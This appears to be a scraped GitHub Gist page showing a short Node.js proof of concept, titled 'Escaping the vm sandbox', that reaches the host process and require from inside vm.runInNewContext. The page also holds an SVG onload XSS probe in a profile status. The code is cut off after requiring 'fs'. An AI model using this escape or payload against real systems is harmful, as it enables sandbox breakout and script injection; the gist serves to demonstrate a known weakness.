Skip to content

Instantly share code, notes, and snippets.

View benjaminjkraft's full-sized avatar
🔓
<svg onload=alert(1)>in your computer</svg>

Ben Kraft benjaminjkraft

🔓
<svg onload=alert(1)>in your computer</svg>
66 followers · 0 following
View GitHub Profile
@domenic
domenic / escape-vm.js
Created August 17, 2015 20:20
Escaping the vm sandbox
"use strict";
const vm = require("vm");
const sandbox = { anObject: {} };
const whatIsThis = vm.runInNewContext(`
const ForeignObject = anObject.constructor;
const ForeignFunction = ForeignObject.constructor;
const process = ForeignFunction("return process")();
const require = process.mainModule.require;
require("fs");